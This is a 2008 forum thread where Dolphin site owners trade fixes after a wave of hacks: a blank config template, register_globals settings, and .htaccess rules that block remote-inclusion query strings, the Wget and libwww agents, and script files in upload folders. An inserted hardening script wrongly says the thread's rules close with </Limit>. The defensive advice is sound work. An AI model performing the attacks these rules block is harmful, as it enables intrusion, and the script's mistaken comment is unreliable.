1. DoLaugh.. any software that NEEDS 777 directories to function HAS to have .htaccess files to protect it.. so switching hosts is really the only solution to prevent hacker problems in the future. Even if Boonex fixes the holes you will still need the 777 dirs.

2. 777 dirs ARE insecure... even more so on a host like Hostforweb that has php running as a module. My only advice is to make SURE you have an .htaccess in each 777 dir that blocks any script from running.

3. About blocking IPs. I tried to go this route but if you look at your logs you will notice that not only do they change IPs each visit they change IPs constantly DURING each visit! For instance you will see a string of get requests like this:

207.23.45.222

207.23.45.254

207.23.45.242

207.23.45.424 

Almost ALL the RFI attempts I see blocked in my logs are from the R.I.P.E network.. which is a semi-anonymous network. I had all the RIPE IPs blocked for a while but after some research I discovered that most of Europe comes through those IPs :-(  I finally unblocked them and just put the htaccess rules in place to block certain query strings and user agents..

 

Well there was my rant for the month, I'll crawl back in my hole now.

Mike

BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
12 Jul 2008

Ok my sites are operational.  The hacks that have left you with "attacked by Turks" or "owned by Spanish hackers" have probably written over your inc/header.inc.php file.  This file is created from the answers you gave to the questions asked at install.  Simply remembering that info and plugging it in to a template, then placing it in your yoursite/inc/header.inc.php will fix most of the problem.  From there like I said earlier you need to look at a lot of files to make sure they did not leave any malicious content behind.  So that leaves us with the obvious question, where do I get a header.inc.php template?

Try this for version 6.1.2:  just fill in the yellow highlights (the CAPITALISED placeholders below) with your info, put it in notepad or an editor, name it header.inc.php and copy it to your inc/ directory.

<?php

/***************************************************************************
*                            Dolphin Smart Community Builder
*                              -----------------
*     begin                : Mon Mar 23 2006
*     copyright            : (C) 2006 BoonEx Group
*     website              : http://www.boonex.com/
* This file is part of Dolphin - Smart Community Builder
*
* Dolphin is free software. This work is licensed under a Creative Commons Attribution 3.0 License.
* http://creativecommons.org/licenses/by/3.0/
*
* Dolphin is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
* without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the Creative Commons Attribution 3.0 License for more details.
* You should have received a copy of the Creative Commons Attribution 3.0 License along with Dolphin,
* see license.txt file; if not, write to marketing@boonex.com
***************************************************************************/

$site['ver']               = '6.1';
$site['build']             = '2';
$site['title']             = 'YOUR SITE TITLE';
$site['url']               = "http://YOUR SITE.COM";
$admin_dir                 = "admin";
$site['url_admin']         = "{$site['url']}$admin_dir/";
$site['url_aff']           = "{$site['url']}aff/";
$site['profileImage']      = "{$site['url']}media/images/profile/";
$site['profileBackground'] = "{$site['url']}media/images/profile_bg/";
$site['profileSound']      = "{$site['url']}media/sound/";
$site['profileVideo']      = "{$site['url']}media/video/";
$site['sharingImages']     = "{$site['url']}media/images/sharingImages/";

$site['mediaImages']       = "{$site['url']}media/images/";
$site['gallery']           = "{$site['url']}media/images/gallery/";
$site['flags']             = "{$site['url']}media/images/flags/";
$site['blogImage']         = "{$site['url']}media/images/blog/";
$site['sdatingImage']      = "{$site['url']}media/images/sdating/";
$site['smiles']            = "{$site['url']}media/images/smiles/";
$site['banners']           = "{$site['url']}media/images/banners/";
$site['imagesPromo']       = "{$site['url']}media/images/promo/";
$site['tmp']               = "{$site['url']}tmp/";
$site['preCheckout']       = "{$site['url']}checkout/pre_checkout.php";
$site['plugins']           = "{$site['url']}plugins/";
$site['base']              = "{$site['url']}templates/base/";


$site['email']             = "EMAIL ADDRESS";
$site['email_notify']      = "EMAIL ADDRESS";
$site['bugReportMail']     = "EMAIL ADDRESS";


$dir['root']               = "YOUR ROOT DIRECTORY PATH TO SCRIPT";
$dir['inc']                = "{$dir['root']}inc/";
$dir['profileImage']       = "{$dir['root']}media/images/profile/";
$dir['profileBackground']  = "{$dir['root']}media/images/profile_bg/";
$dir['profileSound']       = "{$dir['root']}media/sound/";
$dir['profileVideo']       = "{$dir['root']}media/video/";
$dir['sharingImages']      = "{$dir['root']}media/images/sharingImages/";

$dir['mediaImages']        = "{$dir['root']}media/images/";
$dir['gallery']            = "{$dir['root']}media/images/gallery/";
$dir['flags']              = "{$dir['root']}media/images/flags/";
$dir['blogImage']          = "{$dir['root']}media/images/blog/";
$dir['sdatingImage']       = "{$dir['root']}media/images/sdating/";
$dir['smiles']             = "{$dir['root']}media/images/smiles/";
$dir['banners']            = "{$dir['root']}media/images/banners/";
$dir['imagesPromo']        = "{$dir['root']}media/images/promo/";
$dir['tmp']                = "{$dir['root']}tmp/";
$dir['cache']              = "{$dir['root']}cache/";
$dir['plugins']            = "{$dir['root']}plugins/";
$dir['base']               = "{$dir['root']}templates/base/";
$dir['classes']            = "{$dir['inc']}classes/";

$video_ext                 = 'avi';
$MOGRIFY                   = "/usr/X11R6/bin/mogrify";
$CONVERT                   = "/usr/X11R6/bin/convert";
$COMPOSITE                 = "/usr/X11R6/bin/composite";
$PHPBIN                    = "/usr/local/bin/php";

$db['host']                = 'DB HOST (USUALLY LOCAL HOST)';
$db['sock']                = '';
$db['port']                = 'DB PORT';
$db['user']                = 'DB USER';
$db['passwd']              = 'DB PASSWORD';
$db['db']                  = 'DB NAME';


define('BX_DIRECTORY_PATH_INC', $dir['inc']);
define('BX_DIRECTORY_PATH_ROOT', $dir['root']);
define('BX_DIRECTORY_PATH_BASE', $dir['base']);
define('BX_DIRECTORY_PATH_CACHE', $dir['cache']);
define('BX_DIRECTORY_PATH_CLASSES', $dir['classes']);

define('DATABASE_HOST', $db['host']);
define('DATABASE_SOCK', $db['sock']);
define('DATABASE_PORT', $db['port']);
define('DATABASE_USER', $db['user']);
define('DATABASE_PASS', $db['passwd']);
define('DATABASE_NAME', $db['db']);


//check safe_mode
if( (int)ini_get( 'safe_mode' ) )
{
 echo '<b>Warning.</b> Dolphin cannot work in safe mode';
 exit;
}

//check mbstring
if( !extension_loaded( 'mbstring' ) ) {
 echo '<b>Warning!</b> Dolphin cannot work without <b>mbstring</b> extension.
  Please go to the
  <a href="http://www.boonex.com/trac/dolphin/wiki/GenDolTShooter">Dolphin Troubleshooter</a>
  and solve the problem.';
 exit;
}

//check correct hostname
$aUrl = parse_url( $site['url'] );
if( isset($_SERVER['HTTP_HOST']) and $_SERVER['HTTP_HOST'] != $aUrl['host'] and $_SERVER['HTTP_HOST'] != $aUrl['host'] . ':80' )
{
 header( "Location:http://{$aUrl['host']}{$_SERVER['REQUEST_URI']}" );
 exit;
}


// check if install folder exists
if ( file_exists( $dir['root'] . 'install' ) )
{
 $ret = <<<EOJ
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
  <head>
   <title>Dolphin Smart Community Builder Installed</title>
   <link href="install/general.css" rel="stylesheet" type="text/css" />
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  </head>
  <body>
   <div id="main">
   <div id="header">
    <img src="install/images/boonex_logo.gif" alt="" /></div>
   <div id="content">
    <div class="installed_pic">
     <img alt="Dolphin Installed" src="install/images/dolphin_installed.jpg" />
   </div>

   <div class="installed_text">
    Please, remove INSTALL directory from your server and reload this page to activate your community site.
   </div>
   </div>
   </div>
  </body>
 </html>
EOJ;
 echo $ret;
 exit();
}

// set error reporting level
error_reporting(E_ALL & ~E_NOTICE);
set_magic_quotes_runtime(0);
ini_set('magic_quotes_sybase', 0);

// set default encoding for multibyte functions
mb_internal_encoding('UTF-8');

//--- Ray Integration ---//
require_once($dir['root'] . "ray/modules/global/inc/header.inc.php");
require_once($dir['root'] . "ray/modules/global/inc/content.inc.php");
//--- Ray Integration ---//
?>

And by the way if no one else has ever said it DOSDAWG IS THE MAN!  For no real reason that I can see he worked for two days getting me back up. I highly recommend that you give this man business, you will get your money's worth!

Signed Roy

12 Jul 2008

2. 777 dirs ARE insecure... even more so on a host like Hostforweb that has php running as a module. My only advice is to make SURE you have an .htaccess in each 777 dir that blocks any script from running.

When you mention using htaccess to secure a dir that has 777 perms, do you mean with a simple "Deny From All" ?

12 Jul 2008

Of all those who proclaim they have been hacked, please provide us with who your host is, and I would also like to look at your phpinfo(). Yeah, the host tells you that register_globals=OFF, but have you verified that? There are a few scripts that require register_globals to be on; exactly why, I do not know, but those are scripts I would not run.

I'm just curious as to where all of you guys are hosted, and would like to verify that register_globals=OFF. So I see what AndreyP is posting; I know on tallyplayer, his register_globals were on. I am sure he believed them to be turned off, but you will find that if James, with a hosting account that he is paying 25 dollars a month for, is asking for register_globals to be turned on, and you are hosting on that same account for $1.99 and you want register_globals to be off, what do you think they are going to do?

Well I can tell you it's evident: when in Rome do as the Romans. They turn them on, and expecting you to never view your phpinfo() nor read your server logs, they just get away with it.

well that is just my 3 cents worth. gotta go got things to do, good luck to all, and hope things shake out.

later,
DosDawg

Isn't it possible to set reg-Globals on/off on a per-account basis?  Or does that depend on the way php has been compiled (Apache vs CGI)?

I still really don't get why not fix the holes rather than the band-aid approach of turning Register Globals off and assuming that will just 'deal with it'.  That just makes no sense to me at all.

12 Jul 2008

I can use .htaccess files on my server... I was told I can add "php_flag register_globals 0" to my file...

which .htaccess do I add it to? Do I need to add it to all of them? and where in the file do I add that line?

Hakk

12 Jul 2008

Yes if you are going to do it through the .htaccess files it must be each one in each directory, actually, each directory that has 777 chmod.   I would do each to be sure.

Tired,

Reginald

12 Jul 2008

Ok my sites are operational.  The hacks that have left you with "attacked by Turks" or "owned by Spanish hackers" have probably written over your inc/header.inc.php file.  This file is created from the answers you gave to the questions asked at install.  Simply remembering that info and plugging it in to a template, then placing it in your yoursite/inc/header.inc.php will fix most of the problem.  From there like I said earlier you need to look at a lot of files to make sure they did not leave any malicious content behind.  So that leaves us with the obvious question, where do I get a header.inc.php template?

Try this for version 6.1.2:  just fill in the yellow highlights with your info, put it in notepad or an editor, name it header.inc.php and copy it to your inc/ directory.

.....

.....

Signed Roy

Roy,

Also make sure you delete the files they used to upload to your site...

In my case they added files in the following folders: cache, langs, temp, media, orca, backup (probably more).

One thing that would help me (since I did do an upgrade): is there a complete list available of the files and what directories they are in, so I can delete ALL files that do not belong to the program?

hakk

12 Jul 2008

First thing to do is to determine if register_globals is on or off. You can login to your admin panel first then visit:
yoursite.com/admin/phpinfo.php

Scroll down until you see register_globals
You should see two columns, local and master. Master is what your host has specified, and local would be your site/directory. You can override your host's master value by using .htaccess on php apache servers or php.ini with cgi servers.

The code varies slightly.

For php apache servers add to your main .htaccess file yoursite.com/.htaccess:
php_flag register_globals off

For cgi servers add to or edit your current php.ini file in yoursite.com/php.ini:
register_globals = Off

If you don't have php.ini make one with the above line and call it php.ini (cgi-servers only)
Else ask your host for certain and/or exact location to put php.ini

Go back to yoursite.com/admin/phpinfo.php and refresh the page to verify the changes were successful, i.e. register_globals changed from on to off for certain in the local value, but if both local and master change that is ok too.

gameutopia

DialMe.com - Your One and Only Source For Boonex Dolphin Tutorials and Resources
12 Jul 2008

hakknslash: About the "register_globals" line... if you are using a host that allows php options to be set in the .htaccess you will only have to put it in one file. The .htaccess file in the root directory, because .htaccess files are recursive so whatever you put in one affects all subdirectories. If you have to set them in php.ini files then it depends.. some hosts are setup to read from a master php.ini (which you can't access in some cases) and some read from multiple files.

kevinmartin: "deny from all" works in directories where the files are just included in other files (like the cache directory) but you can't use it in any of the directories that have uploads or pictures, if you do you won't be able to access them. Here is what I put in all the 777 dirs that are for uploads:

<LimitExcept GET>
order deny,allow
deny from all
</LimitExcept>

<FilesMatch "\.(cgi|pl|py|bak|txt|htaccess|htpasswd|log|zip|asp|sh|shtml|jsp|gz|tgz|tar|php.*|htm.*)$">
Deny from all
</FilesMatch>

You can add any extension you want to that list.. then if they do get files in your directory they can't do anything with them :-)

Also, two rules to live by... no matter HOW secure you are still check your 777 dirs frequently and back your whole server up once or twice a week!

Mike

BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin
12 Jul 2008

Humorous hackers :)
Has anybody read this before?
http://www.php.net/register_globals manual

So we don't see here any issue for this

It seems that no one that was hacked seems to find it as funny as you do, which seems strangely odd to me anyway!

Do you see any "ISSUE" now AndreyP ?

What about YOU Boonex ???  You are VERY quiet!

12 Jul 2008

As someone who spent 48 hours getting "unhacked" I place no discontent at the feet of Boonex.  They have provided free of charge an outstanding platform to enhance my websites far beyond anything I could have done.  I think the intent has always been for THIS community to be a place to discuss problems and devise solutions.  In the interim I hold pretty good faith that the Boonex development team is working to ensure that future releases are a little better and a little more secure than previous.  No I did not find it funny, but my anger was towards the malicious code writers not those trying to do something positive with their skills in code.  Disgruntled for the lack of direction, a little, but I learned a lot, and made some invaluable alliances along that path, namely DosDawg.  I believe that's what Boonex had envisioned with this community, yes?

Signed,

Roy

12 Jul 2008

hakknslash: About the "register_globals" line... if you are using a host that allows php options to be set in the .htaccess you will only have to put it in one file. The .htaccess file in the root directory, because .htaccess files are recursive so whatever you put in one affects all subdirectories. If you have to set them in php.ini files then it depends.. some hosts are setup to read from a master php.ini (which you can't access in some cases) and some read from multiple files.

kevinmartin: "deny from all" works in directories where the files are just included in other files (like the cache directory) but you can't use it in any of the directories that have uploads or pictures, if you do you won't be able to access them. Here is what I put in all the 777 dirs that are for uploads:

<LimitExcept GET>
order deny,allow
deny from all
</LimitExcept>

<FilesMatch "\.(cgi|pl|py|bak|txt|htaccess|htpasswd|log|zip|asp|sh|shtml|jsp|gz|tgz|tar|php.*|htm.*)$">
Deny from all
</FilesMatch>

You can add any extension you want to that list.. then if they do get files in your directory they can't do anything with them :-)

Also, two rules to live by... no matter HOW secure you are still check your 777 dirs frequently and back your whole server up once or twice a week!

Mike

-----------------------------------------------------

Hi, which directories would you put this code in?

Thanks,

Stuart

There are none so blind as those that will not see.
12 Jul 2008

Stuart you would want to add that code to any .htaccess file that is in a directory with a 777 permission. If a 777 directory does not have a .htaccess, create one with that code and upload it there, for example ray/modules/movie/files/.htaccess

Pretty much any and all 777 folders/directories. 777 folders/directories are the ones that are most likely to get hit with anything. They should be checked periodically just to see if anything odd is in there.

gameutopia

DialMe.com - Your One and Only Source For Boonex Dolphin Tutorials and Resources
12 Jul 2008

Safehtml is a 3rd party script. It's not made by boonex/dolphin company, and a lot of other php scripts also use it so it could potentially be a major problem for a lot of others. Basically safehtml strips harmful code that a member of your site might enter in say a blog post. That little editor you use to type a blog is just one. Now if they enter malicious code safehtml automatically strips it. So its main purpose is good and to protect your site. So this is very ironic that something intended for good is being exploited by a hacker.

DialMe.com - Your One and Only Source For Boonex Dolphin Tutorials and Resources
12 Jul 2008

I was hacked every time I put in a fix or restored my site from a backup.. Hacked BIG time..

very depressing ...lol been down for a week now

I emailed my host about it but they weren't a lot of help in this area, basically asked me to check each file for unusual code...

12 Jul 2008

Hello gameutopia,

I was trying to find out which directories had files with 777 permissions!

Regards,

Stuart

There are none so blind as those that will not see.
12 Jul 2008

Ohh again :)

Why can't you even go to

Members -> Boonex Team

All Boonex staff are there, thanks to all.

So again,

you should have

php_flag register_globals Off
to prevent being hacked.

All hosts must provide this variable as 'Off' by default.

If not, this is not a secure host.

If your hosting doesn't give you the possibility to use .htaccess, ask your host to enable this possibility and also to switch

php_flag register_globals Off
This is a common security issue; strange that your host doesn't provide this. Which version of PHP does it use? 3.0? :)

Since 4.2 this variable is Off by default.

Regards,

BoonEx staff

Andrey,

The problem with that is if you have php_flag register_globals= off, that is only protecting that directory. I was informed that you need to have this line

php_flag register_globals 0

This supposedly stops register_globals site wide rather than just on that directory with the htaccess.

If somebody finds out different, then please let us know.

I have been helping tallyplayer, and we are basically battling with ixwebhosting.com to get the register_globals turned off. They initially said that it was the script's fault, and they sent some excerpt relating to 3rd party scripts, saying it was the user's responsibility to ensure the safety and security of the site. Well I find this to be a ridiculous statement. What are you paying them for, if they are not monitoring the servers to ensure this kind of crap isn't going on on their servers?

Tally contacted support and they basically gave him some lame lines about it being the script's fault. I logged into his support and got in touch with a tech named Artem, who at first tried to ignore my requests, then ultimately decided to help, and also apologized. I know an apology does not fix what was wrong, but just the fact that he acknowledges that it was an error with the server, and not so much the script, was satisfaction for me.

ok all, good luck,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
12 Jul 2008

guys,

after some research and reading multiple posts on here, it is my determination that DOLPHIN is NOT the PROBLEM.

IT IS YOUR SERVER'S SETTINGS. As with most issues with this dolphin script, if you read the server requirements, you will find that you have chosen the wrong host. This has nothing to do with the dolphin developers, and I presume that every open source script I have ever used or read about has been attacked by those who have nothing better to do in their life.

Tighten up your server, ask support to tighten up your server; if that is not possible, then consider moving to a server where you have more control over what is allowed or disallowed.

later,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
12 Jul 2008

First off... Thank you all for identifying the hack problem and providing solutions that can prevent the breach.  Just to summarize and make sure I am doing the right things:

1. I have added php_flag register_globals 0 to the .htaccess file in the main directory used for Dolphin.

2. I have added the following inside <IfModule mod_rewrite.c> ... </IfModule>:


RewriteCond %{QUERY_STRING} ^http   [OR]
RewriteCond %{QUERY_STRING} ^.+www\.  [OR]
RewriteCond %{QUERY_STRING} ^.+https  [OR]
RewriteCond %{QUERY_STRING} ^.+ftp
RewriteRule .* - [L,F]
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]

RewriteCond %{QUERY_STRING}   (.*)=http(.*)   [NC,OR]
RewriteCond %{QUERY_STRING}   (.*)urlx=(.*)   [NC]
RewriteRule ^(.*)  - [F]

3. For directories identified with $ find . -perm 777 -type d, I have added this to each of the .htaccess files:

<LimitExcept GET>
order deny,allow
deny from all
</LimitExcept>

<FilesMatch "\.(cgi|pl|py|bak|txt|htaccess|htpasswd|log|zip|asp|sh|shtml|jsp|gz|tgz|tar|php.*|htm.*)$">
Deny from all
</FilesMatch>

Is there anything else I need to do?  Have I done anything that will have an adverse impact on the way Dolphin/Ray/Orca are supposed to work?

Suggestion.  Seems like someone could write a small shell script to identify the 777 directories, open the .htaccess files, go to the last line and insert the necessary code.

Once again, thank you ALL very much for your help and attention to this potential security problem!!

Arthur
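The script suggested above, as an added example that is not from this thread or from BoonEx: it lists the 777 directories the way Arthur's find command does, reports files in them that match the extensions in Mike's FilesMatch rule, and appends those rules (with the correct </LimitExcept> closing tag) to each directory's .htaccess exactly once. The marker comment and the document-root paths are this example's own choices.

```bash
#!/bin/sh
# Added example, not code from the thread or from BoonEx. Two jobs:
#   audit_777_dirs  ROOT  - list script-like files dropped into 777 directories
#   harden_777_dirs ROOT  - install Mike's .htaccess rules in every 777 directory

# Extension list copied from the FilesMatch rule in the thread. "php.*" also
# catches double extensions such as shell.php.jpg.
BLOCKED_EXT='cgi|pl|py|bak|txt|htaccess|htpasswd|log|zip|asp|sh|shtml|jsp|gz|tgz|tar|php.*|htm.*'
# Marker line (this example's own) so repeated runs do not stack duplicate rules.
MARKER='# dolphin-777-guard (added by harden_777_dirs)'

# Every directory under $1 whose mode is exactly 0777 (Arthur's find command).
find_777_dirs() {
    find "$1" -type d -perm 0777
}

# Print files sitting directly inside a 777 directory whose name ends in one of
# the blocked extensions. The guard .htaccess itself is skipped. Exit status
# follows grep: 0 = something suspicious was found, 1 = clean.
audit_777_dirs() {
    find_777_dirs "$1" | while IFS= read -r d; do
        find "$d" -maxdepth 1 -type f ! -name .htaccess
    done | grep -E "\.(${BLOCKED_EXT})"'$'
}

# Append the guard rules to $1/.htaccess unless the marker is already present.
# Apache requires the section to close with </LimitExcept>; closing it with
# </Limit>, as the copies in the thread do, makes every request to that
# directory fail with a 500 error instead of protecting it.
install_guard() {
    ht="$1/.htaccess"
    if [ -f "$ht" ] && grep -qF -- "$MARKER" "$ht"; then
        return 0
    fi
    cat >> "$ht" <<EOF

$MARKER
# Only GET (and HEAD) may reach this directory: no POST to a dropped script.
<LimitExcept GET>
    Order deny,allow
    Deny from all
</LimitExcept>
# Never serve or execute these extensions from an upload directory.
<FilesMatch "\.(${BLOCKED_EXT})\$">
    Deny from all
</FilesMatch>
EOF
}

# Walk all 777 directories under $1 and guard each one.
harden_777_dirs() {
    find_777_dirs "$1" | while IFS= read -r d; do
        install_guard "$d"
    done
}

# Typical use against a Dolphin document root (placeholder path):
#   audit_777_dirs  /var/www/dolphin
#   harden_777_dirs /var/www/dolphin
```

Run the audit from cron and alert on a non-empty listing; the hardening function is safe to schedule alongside it because the marker keeps it idempotent.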

12 Jul 2008

I would request from Team Boonex, if they know what really needs to be in the .htaccess to close this loop, that they please include this in the install script or hopefully add it to the next upgrade, yes?

Roy

12 Jul 2008

I would request from Team Boonex, if they know what really needs to be in the .htaccess to close this loop, that they please include this in the install script or hopefully add it to the next upgrade, yes?

Roy

2nd that motion

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
12 Jul 2008

I just got hacked a little while ago. Got an email from user "ajaysanhotra" using Praveen's name and an hour later I'm looking at the powered by logo and a few other small issues. I got their IPs, seems to be two of them working it.

denied 118.0.0.0/8  and  129.0.0.0/8 until I can fix this.

12 Jul 2008

I was hacked too!!! in my two hosting sites!!!!!

What is the chance that they also GOT ACCESS TO THE DB INFORMATION??!!! or do they just have the email details????

My webspace was blocked and I can't even look at my files.... SHAME!!!!

I'll have to wait and see if it's the software (Dolphin) or the Hosting.

Also I found and reported that Ray is sending requests all the time and I'm not sure that that is not a security breach!!! What information is it sending and who can hack it when it's sent?? Any INFORMATION in this regard?????

12 Jul 2008

One more comment:

In the header.inc.php the password to the admin is NOT encrypted. Meaning at any given time they have access to the WHOLE site administration????

What about the profile caching files? do they have access to these files too????

Is this not a hole in the software?

Now we'll have to investigate what kind of security breaches there are in this platform. I'm not sure it's just the .htacce

12 Jul 2008

We have been working with the Hosting division of Dolphin Geeks and found that no sites have been compromised.

We had one user that had their inc and periodic directories set at 777 and the files within the periodic directory set at 666. Since they advised that they received an email after being contacted by someone requesting their site details we are assuming that this site was specifically being targeted. We have corrected their file settings. Other than that all has been well.

By default register_globals are set to off on all servers.

I agree with the site owners that have stated that there are going to be vulnerabilities in all software as nothing is completely hacker-proof. Discussions as we have here are what allow us to correct the errors and protect our sites.

It's true 2 heads are better than one or in this case 15 heads are better than one. ;)

Dolphin Geeks

12 Jul 2008

Dolphingeeks, your cheapest hosting plan is $14.95 a month.. that is three times the price of most other hosting companies. Is that for a VPS or something?

12 Jul 2008

Hi EdHandy,

You are correct that the cheapest hosting plan is $14.95. This price is higher than traditional hosts. This is because our offer includes configuring your site for Ray Media Server, testing your site for video and music uploads, and video chat.

No need to worry about video and music upload errors or Orca Errors. We offer free support for these errors and as a result all sites that are hosted on our servers run error-free with regards to the basic dolphin features.

We only do hosting for Dolphin Sites. Therefore our server configurations are specifically geared to the Dolphin Script.

We do not host hundreds of sites on each server. We only host 30 to 60 per server or less. This allows your site to run faster than traditional hosting companies as they have to run a generic configuration to accommodate as many hosting clients as possible. This is where so many site owners are having problems.

If the hosting configuration is configured for Dolphin it will run without errors. The pricing is because of the free configuration and maintenance of a small amount of sites on 1 server.

If you factor in all of the headaches of dealing with traditional hosts related to Dolphin we are sure you will come to the conclusion that our slightly higher prices are well worth it in the long run.

Dolphin Geeks

12 Jul 2008

Is there an official fix for this yet?

My site was hacked right after I registered it and paid the license fee.  My site had no links to it and I was still testing it before I launched it.

I have several other free dolphin sites unregistered and I have had no problems with them.

The hackers must be pulling the urls off of unity/boonex.

12 Jul 2008

We do not host hundreds of sites on each server. We only host 30 to 60 per server or less. This allows your site to run faster than traditional hosting companies as they have to run a generic configuration to accommodate as many hosting clients as possible. This is where so many site owners are having problems.

At $14.95 a month you won't ever have to worry about hosting hundreds of sites Cool

12 Jul 2008

guys,

after some research and reading multiple posts on here, it is my determination that DOLPHIN is NOT the PROBLEM.

IT IS YOUR SERVER'S SETTINGS. As with most issues with this dolphin script, if you read the server requirements, you will find that you have chosen the wrong host. This has nothing to do with the dolphin developers, and I presume that every open source script I have ever used or read about has been attacked by those who have nothing better to do in their life.

Tighten up your server, ask support to tighten up your server; if that is not possible, then consider moving to a server where you have more control over what is allowed or disallowed.

later,

DosDawg

It all seems well and good to take this approach - let's call it the 'Not My Problem' approach (from Boonex's point of view).

But as I have said more than once in this thread - with no reply - why not fix the problem, instead of relying on clients to always get it right with register_globals? The simple facts of the matter are:

1. The majority of users would not know a global variable if it hit them in the face (and indeed they shouldn't be expected to in my view - they want to be end-users not techs and that is their right)

2. A lot of hosts do not have RG off by default.

In the face of that, perhaps you can see it as 'going the extra mile' to simply improve the code so it isn't vulnerable to Register_Globals based attacks? Is it really so invalid to think about protecting your users as much as possible? Simply because it's easier not to bother?

Since the 'official' response from Boonex was to tell us to read up on RG at php.net - let's go with that:

http://www.php.net/register_globals

... and I quote from that page, paragraph 1 "... keep in mind that the directive itself isn't insecure but rather it's the misuse of it."

13 Jul 2008

We have been working with the Hosting division of Dolphin Geeks and found that no sites have been compromised.

We had one user that had their inc and periodic directories set at 777 and the files within the periodic directory set at 666. Since they advised that they received an email after being contacted by someone requesting their site details we are assuming that this site was specifically being targeted. We have corrected their file settings. Other than that all has been well.

By default register_globals are set to off on all servers.

I agree with the site owners that have stated that there are going to be vulnerabilities in all software as nothing is completely hacker-proof. Discussions as we have here are what allow us to correct the errors and protect our sites.

It's true 2 heads are better than one or in this case 15 heads are better than one. ;)

Dolphin Geeks

Ah - it's always nice to see someone use a situation like this to shamelessly advertise their own services :)

13 Jul 2008

We do not host hundreds of sites on each server. We only host 30 to 60 per server or less. This allows your site to run faster than traditional hosting companies as they have to run a generic configuration to accommodate as many hosting clients as possible. This is where so many site owners are having problems.

At $14.95 a month you won't ever have to worry about hosting hundreds of sites Cool

edhandy,

just to let you know that if you are looking for $1.99 hosting, there is plenty out there for you, but i can assure you that you will be faced with many headaches and heartaches. so you think dolphin hosting should be $3.99? let me explain a little something to you about hosting sites and maintaining a server. First of all, you have to do one of two things, you have to purchase the equipment, or lease the equipment, there are pros and cons for either approach. now you have the servers, great, and i did use the plural of that word server(s), as you are not going to be doing a very good job trying to host anybody with one machine. so now you have to find a data house to locate that equipment, "say what" yes ed, you don't put these machines in your garage and offer business hosting, these machines are stored in a data warehouse, climate controlled, with the power and data transfer sources being secured and backed up.

ok so now you have a machine in a data warehouse, you have purchased your choice of transfer rate from the data center, and start configuring your equipment. everything is going good, now servers are purchased, servers are located, configured and ready to go. now what? well i tell you what, you have to most likely sink thousands if not hundreds of thousands into advertising in order to get known to the internet, and global population. and ed, all of this is without making the first penny.

and you think in your mind, that you deserve $1.99 hosting. catch geocities or something dude, angelfire is still giving free hosting i am sure. if you find you a free host that will run dolphin for you, then good for you. we won't even talk about my hosting price, as my hosting starts @ twice the rate you are complaining about. so if you are not ready to spend money for a good hosting provider, then you are going to suffer the consequences later down the line.

so my point is here ed, is that you have no clue what it takes to operate a hosting environment, and i would compare this to you going to the local market and telling the merchant that they are asking too much for their product. ed, it's their product, either you are willing to make that purchase, or you are taking your business down the line.

and to compare $1.99 hosting with a hosting provider that has configured their server to efficiently run the dolphin script, is like comparing the speed of a turtle to the speed of a rocket ship, there is just no comparison.

well i am done with that one, but i hope you understand ed, none of this is free. you got the script free, now you are looking for free hosting. good luck, and report back every time your site goes down, and be sure to blame it on the inadequacies of the script of course.

later,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
13 Jul 2008

Which version of APACHE are you running? Most hosting platforms are running 1.3.3? I am going out on a limb here but I have always powered Dolphin on Apache2.2+ and PHP5.2+ and have never had many of the issues or current hacks you all express. I have been following the Web2.0 Architecture and from what I can put together learning Apache2.2 provides insight into past insecurities which is why the rewrite. This leads to PHP insecurities as well as some cPanel security issues which have all been addressed in the new script writes. My server has been splashed a great deal in the past few days with many trying to exploit the files referred to in here to no avail. My 404 error log is going up dramatically every day, but my sites are fine. I have to stand behind BoonEx on this one. It's not Dolphin but the server hosting platform configuration and a possible 1.3.3 and PHP4 exploit.

13 Jul 2008

Which version of APACHE are you running? Most hosting platforms are running 1.3.3? I am going out on a limb here but I have always powered Dolphin on Apache2.2+ and PHP5.2+ and have never had many of the issues or current hacks you all express. I have been following the Web2.0 Architecture and from what I can put together learning Apache2.2 provides insight into past insecurities which is why the rewrite. This leads to PHP insecurities as well as some cPanel security issues which have all been addressed in the new script writes. My server has been splashed a great deal in the past few days with many trying to exploit the files referred to in here to no avail. My 404 error log is going up dramatically every day, but my sites are fine. I have to stand behind BoonEx on this one. It's not Dolphin but the server hosting platform configuration and a possible 1.3.3 and PHP4 exploit.

just to shed some light on your post. most phpinfo() files i have checked, i don't think any of them were running apache 1.3.3, and none were running php4. so while i believe it's a valid point what you say about staying updated with your system software being critical, i think the larger problem is that these guys are on shared hosting environments, and they have master value register_globals on, and then the fact that dolphin has several directories with 777 perms. so there is a combination of issues that create the pipeline for those little bastards to hack a site.

i think after this episode there are going to be some who have learned from this and some who don't. the other problem i have seen and think is just poor judgement on behalf of any individual trying to run this script or any similar script. NO BACKING UP. the tools are there for you to backup, and you should in all cases use it. to come in here and not have a backup to restore your site no matter what happens, you are non-deserving of help from anybody.

i say this and i can't tell you when it was the last time i made an adjustment to a site without backing up. as you know or i hope you know, every good programmer always states to you that you need to first backup. if you fail to heed that warning, you get what you have coming to you. is this harsh to have this belief? i think not, it's the facts, and there are some things in life you cannot change, and "facts" is one of them.


i do wish all who are suffering peril at this time the best of luck in getting your sites back up and running, and sincerely hope that you have come out of this with a lesson learned.

later,

DosDawg

When a GIG is not enough --> Terabyte Dolphin Technical Support - Server Management and Support
13 Jul 2008

Yeah I did some further Log investigation and found http://www.cdpm3.com as the site trying to run a script against me via the SAFEHTML folder. It fails because it cannot find a wrapper to encase its garbage in. And it is definitely floating IPs. I'll get mad in a few minutes :0

